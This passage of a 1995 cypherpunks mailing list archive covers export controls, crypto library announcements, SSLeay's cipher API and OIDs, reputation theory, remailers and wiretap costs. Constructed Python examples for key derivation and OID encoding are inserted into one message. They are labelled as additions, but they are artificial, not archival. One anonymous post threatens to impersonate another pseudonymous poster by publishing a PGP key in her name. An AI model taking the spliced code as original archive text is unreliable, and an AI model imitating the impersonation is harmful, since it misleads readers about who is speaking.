Enjoy,
Dan
> 
>     1 703 875 6644.
> The kindly administrative assistant there will take your name and address
> and send you a hardcopy of the ITAR regulations.  I don't know about
> overseas mailings.  I also imagine you will have to wait until the current
> US budget stale-mate is resolved.  (Thanks to digest-reader walt@osf.org
> for the phone number.)
> 	/r$
> 

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 21 Nov 1995 17:24:19 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: Export control FTP servers
In-Reply-To: <9511210441.AA26515@sulphur.osf.org>
Message-ID: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



well, since it is "official" policy and the basics concern rejecting all 
foreign addresses and making the proposed recipient agree to a file 
statement agreeing not to export and that he/she/it is an American or 
Canadian citizen, it might be nice if someone who has the `sed ....`
and/or `awk...` scripts would post them for all to use (with whatever 
disclaimers, etc.)

On Mon, 20 Nov 1995, Rich Salz wrote:

> >	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> >and sed. I didn't get the NSA to approve it, but I figure if it's good
> >enough for RSADSI it's good enough for me.
> 
> I believe some of the following has been posted here before.
> The person to speak with is
> 	John Sonderman
> 	Office of Defense Trade
> 	Department of Compliance
> 	703 875 6644
> He's supposed to be Internet-aware.   What's not common knowledge is
> that he's leaving by early December for budgetary reasons.  If you're
> thinking of putting export controlled stuff up for FTP, you should
> probably contact John now.
> 	/r$
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 21 Nov 1995 22:46:14 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
In-Reply-To: <199511211405.GAA17363@jobe.shell.portal.com>
Message-ID: <m0tHtcC-000G1LC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:
 > Alice here ...

How do we know this for a fact?

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | Neither is a good choice:
Potsdam, NY 13676 |  Abortion is murder; forced childbirth is slavery.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Tue, 21 Nov 1995 19:55:14 +0800
To: cypherpunks@toad.com
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd)
Message-ID: <Pine.LNX.3.91.951121193458.8471B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


Found on sci.crypt, apparently not yet posted on this list. I haven't 
examined it at all, caveat emptor. The size of the ZIP file is about 148 Kb.

Enzo

---------- Forwarded message ----------
Path: news.hklink.net!hpg30a.csc.cuhk.hk!cuhknntp!news.uoregon.edu!cs.uoregon.edu!reuter.cse.ogi.edu!hp-cv!hp-pcd!sdd.hp.com!swrinde!newsfeed.internetmci.com!in1.uu.net!brighton.openmarket.com!decwrl!waikato!auckland.ac.nz!news
From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Newsgroups: alt.security,comp.security.misc,sci.crypt
Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows
Date: 20 Nov 1995 09:57:45 GMT
Organization: University of Auckland
Lines: 45
Sender: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Message-ID: <48pjep$7ge@net.auckland.ac.nz>
NNTP-Posting-Host: cs26.cs.auckland.ac.nz
X-Newsreader: NN version 6.5.0 #3 (NOV)
Xref: news.hklink.net alt.security:6498 comp.security.misc:5814 sci.crypt:6827


[This was announced a few days ago, I've reposted it to a few crypto and 
 security groups for people who don't read the archives groups]
 
File name: ftp://garbo.uwasa.fi/pc/security/cryptl99.zip
One line description: Free encryption library for Unix/DOS/Windows
 
This encryption library provides a universal interface to a number of 
conventional-key encryption algorithms.  The library currently supports 
encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, 
triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, 
CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB.  All encryption routines are 
accessed through a single standardised interface with parameters such as 
algorithm, mode and key size being selectable by the user.  The library is 
supplied as source code for Unix, DOS, and the Amiga, and as dynamic link 
libraries for Windows and Windows NT.
 
The design goal for the library was to create an easy-to-use, standardised 
interface to a number of popular encryption algorithms.  Like the standard C 
file I/O libraries which work with FILE objects, this library works with an 
"encryption context" of type CRYPT_INFO.  To encrypt data, you create an 
encryption context, load a user key into it, en/decrypt data, and destroy it 
when you've finished.  This concept lends itself to implementation either as a 
C++ class or as C routines.
 
The library has been written to be as idiot-proof as possible.  On 
initialization it performs extensive self-testing against test data from 
encryption standards documents, and the API's check each parameter and 
function call for errors before any actions are performed, with error 
reporting down to the level of individual parameters.
 
The library API serves as an interface to a range of plug-in encryption 
modules which allow encryption algorithms to be added in a fairly transparent 
manner.  The standardised API allows any of the algorithms and modes supported 
by the library to be used with a minimum of coding effort.  As such the main 
function of the library is to provide a standard, portable, easy-to-use 
interface between the underlying encryption routines and the user software.
 
All code is plain ANSI C, with no machine or OS-specific functions or calls 
being used.
 
Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 21 Nov 1995 20:49:37 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd)
In-Reply-To: <Pine.LNX.3.91.951121193458.8471B-100000@ima.net>
Message-ID: <Pine.SOL.3.91.951121220824.2627A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995, Enzo Michelangeli wrote:
> This encryption library provides a universal interface to a number of 
> conventional-key encryption algorithms.  The library currently supports 
> encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, 
> triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, 
> CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB.  All encryption routines are 

:-) cute, the next version of SSLeay to be released will have the same 
thing, good to see great minds think alike (or is that simple minds 
seldom differ :-).

Currently the interface I will have is
EVP_EncryptInit(EVP_CIPHER_CTX *ctx,EVP_CIPHER *type,unsigned char *key,
	unsigned char *iv);
void EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl,
	unsigned char *in,int inl);
void EVP_EncryptFinal(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl);

with a string to bytes function,
int EVP_BytesToKey(EVP_CIPHER *type,EVP_MD *md,unsigned char *salt,
	unsigned char *data,int datal,int count,
	unsigned char *key,unsigned char *iv);

this is upward compatible with PKCS#5 and will generate a key and iv of 
the correct size depending on the EVP_CIPHER for a data string (the 
lengths are encoded in the EVP_CIPHER definition).
I also have all my Message digest routines using the same type of interface.

What makes this nice is that all my digital signature routines 
(open, seal, sign, verify etc) all take EVP_CIPHER and EVP_MD arguments 
so any cipher can be used and any MD can be used.  The ASN1 object 
identifiers are contained in the EVP_CIPHER/EVP_MD structures.

It also makes the 'demo' program that supports all the above mentioned 
encryption modes (and also does base64 encoding/decoding) only 290 lines 
long :-).

Now, here's the rub, to use a cipher to encode in pkcs#7 (which is what
S/MIME is using) one needs to have an object identifier (for use in the
ASN1 encoding).  I know of very few object identifiers.

type			object identifier.
EVP_des_ecb		1 3 14 3 2 6
EVP_des_ede
EVP_des_ede3		1 2 840 113549 3 17 (or is this EVP_des_ede (2 keys))
EVP_des_cfb		1 3 14 3 2 9
EVP_des_ede_cfb
EVP_des_ede3_cfb
EVP_des_ofb		1 3 14 3 2 8
EVP_des_ede_ofb
EVP_des_ede3_ofb
EVP_des_cbc		1 3 14 3 2 7
EVP_des_ede_cbc
EVP_des_ede3_cbc
EVP_rc4			1 2 840 113549 3 4
EVP_idea_ecb
EVP_idea_cfb
EVP_idea_ofb
EVP_idea_cbc
MD_md2			1 2 840 113549 2 2
MD_md5			1 2 840 113549 2 5
MD_sha			1 3 14 3 2 18

Can anyone out there fill in the blanks?  I also suppose the new version 
of SHA, SHA-1 will also have a different identifier as well which I will 
also need.

In the above, I always use 'ede' to refer to encrypt-decrypt-encrypt with 
2 keys and 'ede3' to refer to ede with three keys.

eric (on a quest for object identifiers... and to finish the next version
      of SSLeay before he goes on a long holiday...)
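
[Added example, not part of the original message and not SSLeay code.] The key and IV derivation described in the message above, sketched in Python using the digest-chaining scheme that later OpenSSL releases document for EVP_BytesToKey; that the 1995 design matched it is an assumption. The function names, the size table and the sample inputs are constructed.

```python
import hashlib

# (key bytes, IV bytes) for a few cipher types named in the message.  The
# message says these lengths are encoded in the EVP_CIPHER definition; this
# dictionary is a constructed stand-in for that.
CIPHER_SIZES = {
    "des_cbc": (8, 8),
    "des_ede3_cbc": (24, 8),
    "idea_cbc": (16, 8),
    "rc4": (16, 0),
}


def _digest(hash_name, data):
    return hashlib.new(hash_name, data).digest()


def pbkdf1(password, salt, count, dk_len, hash_name="md5"):
    """PKCS#5 v1.5 derivation: T_1 = H(P || S), T_i = H(T_(i-1))."""
    if count < 1:
        raise ValueError("iteration count must be at least 1")
    if dk_len > hashlib.new(hash_name).digest_size:
        # PBKDF1 cannot produce more than one digest of output.
        raise ValueError("derived key too long for PBKDF1")
    t = _digest(hash_name, password + salt)
    for _ in range(count - 1):
        t = _digest(hash_name, t)
    return t[:dk_len]


def bytes_to_key(password, salt, count, key_len, iv_len, hash_name="md5"):
    """Chain digests until there is enough material for key and IV.

    D_1 = H^count(P || S), D_i = H^count(D_(i-1) || P || S).
    The first block equals PBKDF1 output, which is the PKCS#5 compatibility;
    later blocks are the extension that covers longer keys.
    """
    if count < 1:
        raise ValueError("iteration count must be at least 1")
    material = b""
    block = b""
    while len(material) < key_len + iv_len:
        block = _digest(hash_name, block + password + salt)
        for _ in range(count - 1):
            block = _digest(hash_name, block)
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]


def derive_for(cipher, password, salt, count=1, hash_name="md5"):
    """Pick the key and IV sizes from the cipher name, as the message describes."""
    key_len, iv_len = CIPHER_SIZES[cipher]
    return bytes_to_key(password, salt, count, key_len, iv_len, hash_name)


if __name__ == "__main__":
    pw = b"constructed passphrase"      # constructed sample input
    salt = bytes(range(8))              # constructed 8-byte salt
    for name in CIPHER_SIZES:
        key, iv = derive_for(name, pw, salt, count=1)
        print(name, key.hex(), iv.hex())
    # count is the only work factor: with count=1 each passphrase guess
    # costs one digest computation per output block.
```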
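
[Added example, not part of the original message and not SSLeay code.] The object identifiers listed in the message above are what ends up in the ASN.1 encoding; this Python sketch encodes them to DER and decodes them again, rejecting malformed input. The OID values are copied from the message's table (only the filled-in rows); the function names are constructed.

```python
# OIDs exactly as given in the message's table; blank rows are left out.
PAGE_OIDS = {
    "EVP_des_ecb": "1 3 14 3 2 6",
    "EVP_des_ede3": "1 2 840 113549 3 17",
    "EVP_des_cfb": "1 3 14 3 2 9",
    "EVP_des_ofb": "1 3 14 3 2 8",
    "EVP_des_cbc": "1 3 14 3 2 7",
    "EVP_rc4": "1 2 840 113549 3 4",
    "MD_md2": "1 2 840 113549 2 2",
    "MD_md5": "1 2 840 113549 2 5",
    "MD_sha": "1 3 14 3 2 18",
}


def _base128(n):
    """Big-endian base-128 with the high bit set on all but the last byte."""
    if n < 0:
        raise ValueError("negative arc")
    out = [n & 0x7F]
    n >>= 7
    while n:
        out.append(0x80 | (n & 0x7F))
        n >>= 7
    return bytes(reversed(out))


def encode_oid(text):
    """Encode '1 2 840 ...' (or dotted form) as a DER OBJECT IDENTIFIER."""
    arcs = [int(a) for a in text.replace(".", " ").split()]
    if len(arcs) < 2 or arcs[0] > 2 or (arcs[0] < 2 and arcs[1] > 39):
        raise ValueError("invalid first two arcs")
    # The first two arcs share one sub-identifier: 40 * first + second.
    body = b"".join(_base128(s) for s in [arcs[0] * 40 + arcs[1]] + arcs[2:])
    if len(body) > 127:
        raise ValueError("long-form length not handled in this sketch")
    return bytes([0x06, len(body)]) + body


def decode_oid(der):
    """Decode a DER OBJECT IDENTIFIER, rejecting malformed encodings."""
    if len(der) < 3 or der[0] != 0x06:
        raise ValueError("not an OBJECT IDENTIFIER")
    if der[1] & 0x80 or der[1] != len(der) - 2:
        raise ValueError("bad length")
    body = der[2:]
    if body[-1] & 0x80:
        raise ValueError("truncated sub-identifier")
    subids, value, at_start = [], 0, True
    for b in body:
        if at_start and b == 0x80:
            # A leading 0x80 is a padded, non-minimal encoding; DER forbids it.
            raise ValueError("non-minimal sub-identifier")
        value = (value << 7) | (b & 0x7F)
        if b & 0x80:
            at_start = False
        else:
            subids.append(value)
            value, at_start = 0, True
    first = subids[0]
    if first < 40:
        arcs = [0, first]
    elif first < 80:
        arcs = [1, first - 40]
    else:
        arcs = [2, first - 80]
    return " ".join(str(a) for a in arcs + subids[1:])


if __name__ == "__main__":
    for name, oid in PAGE_OIDS.items():
        print(f"{name:14s} {oid:22s} {encode_oid(oid).hex()}")
```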




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Wed, 22 Nov 1995 01:36:38 +0800
To: "'cypherpunks@toad.com>
Subject: Using anon.remailers
Message-ID: <01BAB7EF.4FB8FC60@king1-02.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Would someone point me to where I can read about how to use
the cypherpunk and mixmaster type of anon.remailers?
	Thanks, 
	Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 22 Nov 1995 06:41:33 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <199511210028.TAA15346@jekyll.piermont.com>
Message-ID: <9511210055.AA29106@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Er, Newt was the one who railed against the Exon censorship bill, and
>who's said in public that clipper is unrealistic.

And where does that get us? Did Newt stop the Exon bill in its tracks?
Did he do anything to stop the wiretap bill?

If Newt is all stewed up then how come there isn't a provision in his
budget bill to force these laws to be dismantled the same way that there
are provisions on just about every other part of his agenda?

Face it, Newt may speak from the heart, but he acts from his pocket.

We haven't put enough into his back pocket to get attention.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 22 Nov 1995 13:43:33 +0800
To: Wei Dai <cypherpunks@toad.com>
Subject: Re: towards a theory of reputation
Message-ID: <199511220523.VAA28300@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:14 PM 11/21/95 -0800, Wei Dai wrote:
> The first step toward a theory of reputation is defining what reputation 
> is.  [...]  If these interactions are mainly economic in nature, 
> then we can represent Alice's reputation of Bob by a graph with 
> the horizontal axis labeled price and the vertical axis labeled 
> expected utility. 

Any attempt to discuss and analyze reputations using
morally neutral language is bound to wind up as boring long
winded meaningless complicated word salad.

You will wind up in the same place as the behaviorists did,
going in ever diminishing epistemological circles until you
vanish into the whichness of why and the whyness of which.

Some things, for example reputations, behavior, or the 
principle of mathematical induction, necessarily involve 
concepts that are philosophically problematical.   Any attempt
to discuss these things while avoiding philosophically
problematic concepts invariably degenerates into total fog.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 00:35:33 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511211555.HAA27530@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


[note cunning copy of Alice type quoting style, and cunning use of
the same remailer as the last in the chain]

On Tue, 21 Nov 1995, Russell Nelson wrote:

> anonymous-remailer@shell.portal.com writes:
> > Alice here ...
> 
> How do we know this for a fact?

We don't.

As an incentive for Alice to generate herself a PGP key, I hereby
place Alice on notice that if she doesn't sign her next post, and
provide a PGP key, I will create one for her, and steal all the
positive (?) reputation that she has developed so far.

You have 24 hours Alice, otherwise a key gets posted to here, and to
the keyservers with your nym on it.

[someone masquerading as]

Alice de 'nonymous ...

[who will soon steal her nym (as an experiment in Nym
misappropriation, and reputation theft from those who don't use
authentication).  Evolution in action :-)]

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 23 Nov 1995 01:05:58 +0800
To: Wei Dai <wjhalv1@PacBell.COM>
Subject: Re: towards a theory of reputation
Message-ID: <199511221621.IAA19163@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>On Mon, 20 Nov 1995, James A. Donald wrote:
>
>> Any attempt to discuss and analyze reputations using
>> morally neutral language is bound to wind up as boring long
>> winded meaningless complicated word salad.

At 12:19 AM 11/22/95 -0800, Wei Dai wrote:
>I don't understand what you mean by this.  Can you give an example to how 
>to discuss reputation (i.e., the concept of reputation, not a particular 
>reputation) using morally non-neutral language?

Under current circumstances, where we have a large oversupply of
free government supplied retributive violence, the most important
form of reputation is "credit rating", which indicates willingness
to pay one's legitimate debts and perform contracts.

Willingness to fulfill one's obligations is not at all the same thing as
willingness to act in a way that improves other peoples utility.

Fulfilling an obligation assumes normative criteria.  Any
attempt to describe credit worthiness in terms of its effect
on the utility of creditors misses the point.  

Before the nineteenth century, when most governments were reluctant
to provide adequate retributive violence, and were more concerned
with collecting taxes than upholding law and order, the most 
important form of reputation was the reputation for being a 
"gentleman" which encompassed both willingness to pay one's 
just debts and "gentle" conduct, gentle conduct meaning that 
you were unlikely to kill or harm people without good reason,
but did not require that you went around performing good works.

Now if someone has a reputation for good workmanship, this might
seem non normative, but such a reputation is a mixture of two 
components:  "X has good quality products" which is not normative
and is a fact rather than a reputation, because it does not involve 
a prediction of future behavior and "X will fulfill the spirit 
and intention of a contract" which is a reputation, and is normative.

For example although in principle X might simultaneously have
reputation for good workmanship and a reputation for not paying 
his debts and not delivering on contracts, such a combination 
would seem unusual and surprising.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@conch.aa.msen.com (Lou Poppler)
Date: Wed, 22 Nov 1995 08:35:54 +0800
To: cypherpunks@toad.com
Subject: Re: Mandarins, Lifers, and Talents
In-Reply-To: <v02120d07acd12fd83388@[199.0.65.105]>
Message-ID: <NHeswMz2B8gV083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 Nov 1995 16:02:09 -0500,
rah@shipwright.com (Robert Hettinga) wrote:
} One of my messier theories about the internet is that it was invented by
} mandarins. Now the talents, the people you call pioneers, have moved in,
} and they're much more pragmatic, and have little patience for crystalline
} perfection, because inefficiency and chaos is where they find beauty, joy,
} and all those other nasty imprecise concepts. When things settle down a bit,
} the lifers will come.  They're trying to do it now, by building sites like
} www.time.com, or buying into sites like www.wired.com.

Waitaminute, I still remember the Old Days. 
I helped run one corner of the MERIT network, back when it only offered
proto-telnet interactive connections to three mainframes total.  
The network ran on PDP-11s lashed crudely to our mainframes and connected 
to each other on 4800 baud leased lines (half-duplex).

Mandarins were involved in the genesis, certainly, both of our little 
college network, and of the military's arpanet.  The mandarins provided
our subsidies, and some of them found ways to use the net in doing their
academic work.  Very many of them ignored us.  Among us paid computer staff,
the mandarins held occasional blue-sky meetings to plot the future and
standards for the future; the lifers went about their business of feeding
hollerith cards to the mainframes; and the talents immediately set about
exploring this orthogonal new quirk of their machine.  All the edges were
rough in the beginning, and for a long time after the beginning.  Network
code arrived in huge inspired chunks from our eccentric talents.  Other
talents, staff and user alike, would go out to play on the network and
find little suggestions for the eccentric talents responsible.

I think the early networks were less than satisfying for the mandarins.
It required arcane mandarin accounting schemes to rationalize our
perpetual deficits, even in a 'funny money' accounting world.
Policies and standards were strained by the sudden accessibility of 
the foreign operations, under alien chains of command.  The networks
were immediately untidy and required compromise from the user.

The biggest contribution from the mandarins, and I mean this with 
all gratitude, is that they chose, again and again, not to shut us down.

ObCrypto: we were still getting the bugs out of rot13 back then.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp@mail.msen.com>    |    http://www.msen.com/~lwp/   ::
::        * Support The Phil Zimmermann legal defense fund *              ::
::                http://www.netresponse.com/zldf                         ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Wed, 22 Nov 1995 00:27:09 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511210955.BAA16150@jobe.shell.portal.com>
Message-ID: <199511211546.JAA04806@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com said:

a> On Mon, 20 Nov 1995 hallam@w3.org wrote:
>> I think it would be better to slap a RICO suit onto the company
>> concerned. It sound to me like an attempt to gain financial advantage
>> through threatening behaviour. Where I come from that means jail
>> time.

a> RICO is very serious stuff.  Criminal prosecution under the terms of
a> the Racketeer-Influenced & Corrupt Organizations Act is reserved for
a> very serious situations indeed.  It's true "rubber hose" stuff.

a> It was intended as a tool for use against mobsters, but US attorneys
a> have used it against white-collar criminals.  I think, you'd have to
a> have strong evidence of an ongoing "criminal enterprise", which I
a> don't think you have with junk e-mail.

	Actually, they've started using it against vicious
reversed-black-collar (and non-collared) criminals for daring to
exercise their right under the first amendment to peaceably protest.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Wed, 22 Nov 1995 00:27:48 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511211219.EAA10354@jobe.shell.portal.com>
Message-ID: <199511211551.JAA04817@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com said:

a> On Tue, 21 Nov 1995, Rich Salz wrote:
>> >RICO is very serious stuff.  Criminal prosecution under the terms of
>> the
>> 
>> Like Operation Rescue?

a> My apologies, I'm sorry but I don't understand this reference.  What
a> does Operation Rescue have to do with the seriousness of RICO?  What
a> is Operation Rescue?

a> I am definitely not an expert on foreign statute.

	They (as in, the government) have used the RICO laws against
Operation Rescue, an anti-abortion/pro-life (pick your term) group for
protesting/picketing abortion clinics and doctors who perform abortions.
If they had prosecuted under statutes which applied to everyone, I
wouldn't have had a problem, but they are going after OR and similar
organizations for using tactics similar to those used by civil rights
protesters in the 60s.  'Course, civil rights is Politically Correct.
Abortion rights is Politically Correct.  Protesting abortion is
Politically Incorrect, therefore illegal.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Wed, 22 Nov 1995 03:13:13 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Cyberpunk handbook [NOISE]
In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com>
Message-ID: <9511211827.AA27657@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> You Bay Area people probably know all about this already, but I was
> browsing through the local bookstore yesterday and saw Eric Hughes,
> Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook",
> a slim satirical volume by the Mondo 2000 people.  The book has more
> attitude than information, though.

Apart from the unfortunate choice of cover model :>, the book is
co-authored by Jude Milhon.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 Nov 1995 03:05:54 +0800
To: cypherpunks@toad.com
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <acd75bfd090210044420@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:05 PM 11/21/95, Peter Wayner wrote:
>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening? Doesn't a court ordered wire tap
>require that people listen in and screen the recordings. Does
>this have to be in real time? I can't remember, but I think
>there is a fairly onerous evidentiary chain required to use this
>technology.
...

The manpower shortage can be solved by moving the listening step offshore,
perhaps to one of the Caribbean islands that processes credit card slips.

Even cheaper would be to subcontract out the listening to the relatively
impoverished, but well-educated and English-trained, former Soviet bloc
nations. For example, Romania or Bulgaria, or even Russia. They may still
have the old listening infrastructure in place, although I hear that Stasi
headquarters in the former DDR is now an acupuncture clinic.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 22 Nov 1995 03:31:56 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511211859.KAA20466@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice here ...

No, *I* am the real Alice, and I refuse to use PGP signing.

Alice de 'nonymous ...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Wed, 22 Nov 1995 00:34:58 +0800
To: cypherpunks@toad.com
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02130512acd7941208f9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone ever done the math on the FBI's new wire tapping
proposals and determined whether they'll have enough agents to
do all of the listening? Doesn't a court ordered wire tap
require that people listen in and screen the recordings. Does
this have to be in real time? I can't remember, but I think
there is a fairly onerous evidentiary chain required to use this
technology.

For instance, if 1% of America is on the phone during the peak
hours of the day, then that puts 2.5 million Americans on the
phone or 1.25 million conversations. If the FBI wants access to
1% of that, that is still 12,500 simultaneous conversations.
That would seem to imply 12,500 people to listen to the tapes,
right? Would that take agents off the streets?

12,500 agents would cost $1.2 billion a year if they each cost
about $100,000 in salary and benefits. But we need to account
for vacations, shift work and testifying at the trials of the drug
lords who are sent to jail. Let's assume that you only need
1/10th the people to handle the two evening shifts. That gives
you a cost of $1.4 billion before vacations. Adding 40% to cover
vacation and weekends puts you close to $2 billion. Let's round
up.

So it would cost $2 billion just to use the information here.
This leads me to believe that they're thinking of building
automatic voice recognition equipment in the future. What does
anyone think of the numbers?

-Peter Wayner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 22 Nov 1995 01:27:22 +0800
To: cypherpunks@toad.com
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02120d02acd7b0dbea42@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening?

Hettinga's Corollary to Gilmore's Law ("Censorship is Damage")

In a geodesic network, one node can't route all the traffic. It will choke.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 22 Nov 1995 01:29:48 +0800
To: cypherpunks@toad.com
Subject: FW: Electronic Commerce and the Internet (6/96 CACM)
Message-ID: <v02120d03acd7b25b44b5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: Fisher Mark <FisherM@is3.indy.tce.com>
To: www-buyinfo <www-buyinfo@allegra.att.com>
Subject: FW: Electronic Commerce and the Internet (6/96 CACM)
Date: Tue, 21 Nov 95 09:21:00 PST
Encoding: 61 TEXT


>From the net-happenings list...
=========================
From: Gleason Sackman <sackman@plains.nodak.edu>
Date: Mon, 20 Nov 1995 10:36:42 -0600 (CST)
Subject: WWW> CALL FOR PAPERS: Electronic Commerce and the Internet

From: raustin@netcom.com (Rick Austin)
Date: Fri, 10 Nov 1995 03:11:56 GMT

     Call for Papers:


